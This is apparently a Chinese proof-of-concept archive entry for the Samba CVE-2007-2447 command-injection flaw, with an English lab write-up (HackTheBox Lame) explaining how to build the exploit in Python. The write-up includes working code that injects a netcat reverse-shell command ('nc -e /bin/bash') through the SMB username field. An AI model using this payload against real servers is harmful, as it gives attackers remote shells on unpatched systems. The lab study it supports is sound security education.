关联漏洞
标题:
Samba MS-RPC Shell命令注入漏洞
(CVE-2007-2447)
描述:Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。该软件支持共享打印机、互相传输资料文件等。 Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。 Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执
介绍
# ExploitDev Journey #6 | CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username' map script' Command Execution
Original Exploit: https://www.exploit-db.com/exploits/16320 <br>
**Exploit name:** Samba username map script RCE <br>
**CVE**: 2007-2447 <br>
**Lab**: Lame - HackTheBox
### Description
There is a vulnerability in Samba versions below 3.0.25 that allows an attacker to execute system commands by sending a malformed request as username to the SMB server.
<br>
### How it works
Here is an example of using the `nohup` command to create a directory:
<img src="https://i.ibb.co/4WCvK6S/lame1.png">
Programmatically speaking `/=` means divide and assignment operator usually used in loops. But why do we need to use it here? <br>
The reason for using that is to divide the domain field and username field while sending the request, a better explanation can be found [here](https://0x00sec.org/t/cvexplained-cve-2007-2447/22748).
We use the username field to open a netcat connection and connect to our server.
<br>
### Writing the exploit
Writing the exploit is very easy because there is already a SMB Client library available for Python (install python3-samba package) so all you have to do is to use it like this:
```py
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username, '', '', '')
try:
print("Sending payload")
conn.connect(rhost, rport, timeout=10)
except Exception as e:
sys.exit(e)
```
Let's understand how `SMBConnection` works, I provided the `username` but what are the 3 other empty strings? <br>
Those 3 other arguments are: `password`, `my_name` & `remote_name`
For purposes of making our exploit easy to read, we can explicitly write them along with their values but the values for the arguments after `username` are not required:
```py
conn = SMBConnection(username=username, password='', my_name='', remote_name='')
```
The following part is easier to understand, we use the instance of `SMBConnection` class to make a connection and we provide target's IP, port and a timeout number in seconds:
```py
conn.connect(rhost, rport, timeout=10)
```
<br>
### Final thoughts
In this exploit development session you learned about creating an SMB client and connecting to a SMB server. You also learned about Linux commands such as `nohup` which you can later experiment around. You learned about connecting to your attacker machine from the victim machine using netcat which is something that might come useful in your exploit development journey.
文件快照
[4.0K] /data/pocs/66bf1b2bf49dcdaed3af7074a0293e7a6bc495f7
├── [ 705] exploit.py
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。